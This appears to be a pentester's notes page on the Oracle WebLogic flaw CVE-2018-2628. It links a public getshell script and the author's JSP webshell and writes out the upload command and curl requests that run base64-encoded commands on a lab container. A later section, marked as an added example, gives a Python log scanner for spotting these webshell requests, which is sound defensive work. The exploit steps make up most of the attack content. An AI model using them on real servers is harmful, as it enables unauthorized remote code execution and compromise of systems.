# WebLogic - CVE-2018-2628

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components).

Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.

## PoC

This vulnerability can be exploited using [jas502n](https://github.com/jas502n/CVE-2018-2628)'s script [`CVE-2018-2628-Getshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2018-2628/CVE-2018-2628-Getshell.py). A working webshell (to be uploaded) can be found on my [git](https://github.com/0xPThree/WebLogic/blob/main/cve-2018-2628/shell1.jsp). It is massive and looks weird, but as you can see in the picture, it will be compiled to a smaller shell.

This is probably an error on my end, but I'm too lazy to investigate at the moment.

**Note** that the shell is <mark style="color:red;">**one-time-use**</mark> only, meaning it will be removed once you execute a command.

```sh
## Tested on Vulhub's weblogic:10.3.6.0-2017 container
» docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED       STATUS                 PORTS                                                                                            NAMES
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017                                "startWebLogic.sh"       5 hours ago   Up 5 hours             5556/tcp, 0.0.0.0:7003->7001/tcp, :::7003->7001/tcp, 0.0.0.0:9004->9002/tcp, :::9004->9002/tcp   vuln-weblogic
```

```sh
## Upload shell
» python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
>>>Shell File Upload Dir:  servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

## Execute command ('hostname' in this case)
» curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
->|vuln-weblogic
|<-%
```

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FmrOlQD3BcyNbxGBehflJ%2Fimage.png?alt=media&#x26;token=d2bcefb6-b30a-41ca-87db-45d98902c466" alt=""><figcaption></figcaption></figure>
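The request pattern shown above, seen from the detection side, as an added example that is not part of the original page or of the PoC script: it scans access-log lines for JSP requests under `/bea_wls_internal/` where any query parameter base64-decodes to printable text, and reports the decoded command. The log lines are constructed, and the common log format, `REQ_RE` and the function names are assumptions to adapt to your own `access.log`.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in common log format (assumed; adjust REQ_RE to your access.log).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2023:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3128
10.0.0.9 - - [12/Mar/2023:10:04:41 +0000] "GET /bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg== HTTP/1.1" 200 21
10.0.0.9 - - [12/Mar/2023:10:05:10 +0000] "GET /bea_wls_internal/shell1.jsp?tom=aG9zdG5hbWU= HTTP/1.1" 404 1164
10.0.0.7 - - [12/Mar/2023:10:06:00 +0000] "GET /bea_wls_internal/classes/?debug=true HTTP/1.1" 404 1164
"""

REQ_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def decode_b64_text(value):
    """Return the decoded text if value is valid base64 of printable ASCII, else None."""
    try:
        padded = value + "=" * (-len(value) % 4)
        text = base64.b64decode(padded, validate=True).decode("ascii").strip()
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text and text.isprintable() else None

def find_webshell_hits(log_text):
    """Flag JSP requests under /bea_wls_internal/ carrying a base64-encoded parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["uri"])
        path = unquote(url.path).lower()
        if not (path.startswith("/bea_wls_internal/") and path.endswith(".jsp")):
            continue
        # The parameter name is not trusted as an indicator; every value is checked.
        for name, value in parse_qsl(url.query):
            # parse_qsl turns '+' into a space; restore it before decoding.
            cmd = decode_b64_text(value.replace(" ", "+"))
            if cmd:
                hits.append({"src": m["src"], "path": url.path, "param": name,
                             "command": cmd, "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit)
```

Because the shell deletes itself after one command, a 200 followed by a 404 for the same JSP path from the same source is worth correlating with file-creation events under the `_WL_internal\bea_wls_internal` temp directory.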
